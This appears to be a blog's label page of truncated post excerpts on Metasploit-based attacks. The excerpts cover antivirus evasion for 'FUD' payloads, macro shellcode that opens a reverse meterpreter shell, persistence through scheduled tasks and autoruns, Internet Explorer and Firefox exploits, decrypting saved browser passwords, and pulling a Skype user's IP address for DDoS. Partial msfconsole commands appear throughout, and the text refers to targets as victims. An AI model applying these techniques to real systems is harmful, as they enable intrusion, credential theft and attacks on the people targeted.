Showing posts with label metasploit. Show all posts
Showing posts with label metasploit. Show all posts
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List of Differnet AV evasion Frameworks.

Today we are gonna talk about different AV evasion frameworks for metasploit payload & how to use them? It`s very imporatant when you know which AV you have to bypass, because we don`t have to worry about FUD. Some payload can bypass specific AV ; while other AV can not be bypassed using that payload.(1)Veil:-Veil...
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Get shell Using Shellcode in Macro.

We can execute shellcode directly in macro. It`s very old method, but still it`s useful ; because AV don`t trigger it.First we will generate VB code of our payload.msfconsoleuse payload/windows/meterpreter/reverse_tcpset LHOST LPORT 443generate -t vbaexploit Now we have generated our shellcode. Now we...
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Fun with skype resolver

Skype resolvers are used by hackers to get Skype users IP addresses, when a hacker get a users IP address they usually hit them off or DDoS them.If your victim is in your friend-list & you are using linux ; then it`s very simple to get his I.P. netstat -tupan | grep skype > n1Now chat with your victim; as soon as...
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Get shell using Missing Autoruns.

In previous post we saw that how can we execute schedule task after compromised PC.Today we will see another method to maintaining access of compromised pc.(A)When we install program in windows environment , some of them are asking to run at startup times. So these program write its value to windows registry & whenever...
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Schedule Task in windows after Exploitation.

Recently in Derbycon mubix & carnal0wnage present "windows attacks at is the new black ". It`s really great presentation . You can find it here. So i will put  their method here.After getting meterpreter shell ; we have to maintain access of shell. You can use meterpreter backdoor & persistent backdoor . But...
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Exploit For All IE version(CVE-2013-3893).

Recently the public has shown a lot of interest in the new Internet Explorer vulnerability (CVE-2013-3893) that has been exploited in the wild, which was initially discovered in Japan. At the time of this writing there is still no patch available, but there is still at least a temporary fix-it that you can apply from...
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Hack local network PC using windows theam file.

This module exploits a vulnerability mainly affecting Microsoft Windows XP and Windows 2003. The vulnerability exists in the handling of the Screen Saver path, in the [boot] section. An arbitrary path can be used as screen saver, including a remote SMB resource, which allows for remote code execution when a malicious .theme...
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Extract & decrypt passwords from Firefox & Thunderbird.

Today we are going to extract password from Fireox & Thunderbird which are saved in browser and then try to decrypt that passwords from remote PC. Before some times ; i posted here that how to extract information from saved sqlite database of skype, firefox, chrome using python script.Most of the morden browser save...
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Exploit for IE 9 on Windows 7 SP1

This is a memory corruption bug found in Microsoft Internet Explorer. On IE 9, it seems to only affect certain releases of mshtml.dll. For example: This module can be used against version  9.0.8112.16446TargetIE 9 on Windows 7 SP1 (mshtml 9.0.8112.16446)msf > use exploit/windows/browser/ms13_059_cflatmarkuppointermsf...
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Exploit Oracle Endeca Server with metasploit.

This module exploits a command injection vulnerability on the Oracle  Endeca Server 7.4.0. The vulnerability exists on the createDataStore  method from the controlSoapBinding web service. The vulnerable method only exists on the 7.4.0 branch and isn't available on the branch. On the other hand, the injection...
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Post exploitation & swaparoo backdoor.

Today we are going to create valid RDP user in victim pc using two method.(1)As usual get meterpreter session of victim using metasploit.We need system privilege So use getsystem .(getsystem will work in xp. But if victim has windows 7 than you have to use bypassuac module;it will work if victim has admin provilage.But...
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Post exploitation using Nishang.

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and post exploitation during Penetraion Tests. The scripts are written on the basis of requirement by the author during real Penetration Tests. This framework is written by Nikhil Mittal who is also author...
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Bypass AV using powershell method using batch file.

In penetration testing first step is how we can bypass AV & make our payload FUD. Previously we saw that we can bypass AV using Veil.At that time we used python module.In veil there are four types of payload.C,C#,powershell and python. Today we use powershell module.If you don`t aware about powershell ; then you can...
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Exploit for Firefox 17 in Windows XP sp3

Recently Mozilla Firefox 0day possibly being used by the FBI in order to identify some users using Tor for crackdown on child pornography.Now exploit is available in metasploit. Use msfupdate to get it.Exploit target:   Id  Name   --  ----   0   Firefox 17 & Firefox...
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Bypass AV using Veil In Backtrack.

Today this blog complete exactly one year.Before one year i started journey in security world & still now it`s going well.Ok get to the point.Most of time it happened that our payload is detected by AV ;we can use encoder to encode our payload ;So it can not be detected by AV. Today we show how we can bypass AV using...